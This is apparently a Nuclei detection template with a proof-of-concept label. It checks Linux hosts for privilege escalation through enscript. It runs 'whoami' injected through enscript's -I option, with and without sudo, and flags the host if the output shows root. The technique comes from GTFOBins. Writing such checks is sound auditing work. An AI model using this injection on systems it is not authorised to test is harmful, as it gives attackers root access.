enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.
PoC代码[已公开]
id: privesc-enscript
info:
name: enscript - Privilege Escalation
author: daffainfo
severity: high
description: |
enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.
reference:
- https://gtfobins.github.io/gtfobins/enscript/
metadata:
verified: true
max-request: 3
tags: code,linux,enscript,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
enscript /dev/null -qo /dev/null -I 'whoami >&2'
- engine:
- sh
- bash
source: |
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a004830460221008e673256bc2cf9f2924befc90a39f29f5c2d789b308d7e87dd705c8babba23a5022100ffa0c77b8d3d76a50f42527876da3d2220943da10c01d190ca44f80e63916795:922c64590222798bb761d5b6d8e72950